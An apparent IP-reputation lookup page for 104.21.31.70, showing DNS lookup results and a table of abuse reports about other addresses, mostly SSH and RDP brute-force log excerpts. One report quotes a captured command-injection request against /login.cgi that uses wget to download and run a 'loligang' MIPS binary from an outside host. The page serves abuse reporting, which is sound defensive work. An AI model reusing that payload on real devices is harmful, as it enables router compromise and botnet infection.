104.21.31.70 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: United States

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 104.21.31.70
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 9279
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;104.21.31.70.			IN	A

;; AUTHORITY SECTION:
.			379	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021700 1800 900 604800 86400

;; Query time: 57 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Feb 17 20:38:37 CST 2022
;; MSG SIZE  rcvd: 105

Host info

Host 70.31.21.104.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 70.31.21.104.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
118.163.47.25	attackbotsspam	Unauthorized SSH connection attempt	2019-06-22 21:02:50
196.235.57.117	attackspam	SS1,DEF GET /login.cgi?cli=aa%20aa%27;wget%20http://ardp.hldns.ru/loligang.mips%20-O%20-%3E%20/tmp/.loli;%20/tmp/.loli%20loligang.mips.dlink%27$	2019-06-22 20:54:40
69.60.21.172	attackspam	SSH Server BruteForce Attack	2019-06-22 20:40:44
157.230.109.166	attack	Jun 22 07:11:55 mail sshd[23014]: Invalid user admin from 157.230.109.166 ...	2019-06-22 21:12:33
185.254.120.9	attackbotsspam	RDP Bruteforce	2019-06-22 20:29:10
157.55.39.235	attackbotsspam	Automatic report - Web App Attack	2019-06-22 20:33:59
104.248.132.173	attackspambots	Jun 22 06:19:17 lnxmail61 sshd[6972]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.132.173 Jun 22 06:19:17 lnxmail61 sshd[6972]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.132.173	2019-06-22 20:19:31
218.22.98.178	attackspambots	IMAP brute force ...	2019-06-22 20:23:57
118.25.48.248	attack	Jun 21 22:46:07 cac1d2 sshd\[2025\]: Invalid user dan from 118.25.48.248 port 33966 Jun 21 22:46:07 cac1d2 sshd\[2025\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.25.48.248 Jun 21 22:46:09 cac1d2 sshd\[2025\]: Failed password for invalid user dan from 118.25.48.248 port 33966 ssh2 ...	2019-06-22 20:37:45
103.207.39.88	attackbots	Jun 22 11:16:56 lcl-usvr-02 sshd[9644]: Invalid user support from 103.207.39.88 port 63290 Jun 22 11:16:56 lcl-usvr-02 sshd[9644]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.207.39.88 Jun 22 11:16:56 lcl-usvr-02 sshd[9644]: Invalid user support from 103.207.39.88 port 63290 Jun 22 11:16:58 lcl-usvr-02 sshd[9644]: Failed password for invalid user support from 103.207.39.88 port 63290 ssh2 Jun 22 11:16:56 lcl-usvr-02 sshd[9644]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.207.39.88 Jun 22 11:16:56 lcl-usvr-02 sshd[9644]: Invalid user support from 103.207.39.88 port 63290 Jun 22 11:16:58 lcl-usvr-02 sshd[9644]: Failed password for invalid user support from 103.207.39.88 port 63290 ssh2 Jun 22 11:16:58 lcl-usvr-02 sshd[9644]: error: Received disconnect from 103.207.39.88 port 63290:3: com.jcraft.jsch.JSchException: Auth fail [preauth] Jun 22 11:16:58 lcl-usvr-02 sshd[9700]: Invalid user service from 103.207.39.88 port	2019-06-22 21:13:01
118.122.124.78	attackbotsspam	Jun 22 09:11:05 *** sshd[17344]: Invalid user testuser from 118.122.124.78	2019-06-22 20:36:28
178.128.214.153	attack	Unauthorised access (Jun 22) SRC=178.128.214.153 LEN=40 TTL=243 ID=43243 TCP DPT=3389 WINDOW=1024 SYN Unauthorised access (Jun 21) SRC=178.128.214.153 LEN=40 TTL=243 ID=49995 TCP DPT=3389 WINDOW=1024 SYN Unauthorised access (Jun 20) SRC=178.128.214.153 LEN=40 TTL=243 ID=16454 TCP DPT=3389 WINDOW=1024 SYN Unauthorised access (Jun 18) SRC=178.128.214.153 LEN=40 TTL=243 ID=50421 TCP DPT=3389 WINDOW=1024 SYN Unauthorised access (Jun 18) SRC=178.128.214.153 LEN=40 TTL=243 ID=5510 TCP DPT=3389 WINDOW=1024 SYN Unauthorised access (Jun 17) SRC=178.128.214.153 LEN=40 TTL=243 ID=35628 TCP DPT=3389 WINDOW=1024 SYN	2019-06-22 20:26:42
218.92.0.133	attackspam	2019-06-22T12:11:56.391489Z 4e06a9e67cf3 New connection: 218.92.0.133:13080 (172.17.0.2:2222) [session: 4e06a9e67cf3] 2019-06-22T12:12:12.122309Z b1e66fe6e9ed New connection: 218.92.0.133:18456 (172.17.0.2:2222) [session: b1e66fe6e9ed]	2019-06-22 20:39:38
81.22.45.26	attackspam	Jun 22 09:10:02 mail kernel: [558556.779684] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3c:05:0d:89:f8:66:f2:68:66:ff:08:00 SRC=81.22.45.26 DST=77.73.69.240 LEN=40 TOS=0x00 PREC=0x00 TTL=249 ID=17976 PROTO=TCP SPT=48370 DPT=8001 WINDOW=1024 RES=0x00 SYN URGP=0 ...	2019-06-22 20:44:13
188.226.182.209	attack	Jun 22 11:54:33 *** sshd[32641]: Invalid user nao from 188.226.182.209	2019-06-22 21:07:32

Recently Reported IPs

104.21.31.7	104.21.31.87	104.21.31.88	104.21.31.92
104.21.31.97	104.21.32.100	27.70.95.156	104.21.32.102
104.21.32.109	104.21.32.110	104.21.32.111	106.206.43.154
104.21.32.114	104.21.32.126	104.21.32.128	104.21.32.130
104.21.32.132	230.28.126.187	104.21.32.135	104.21.32.136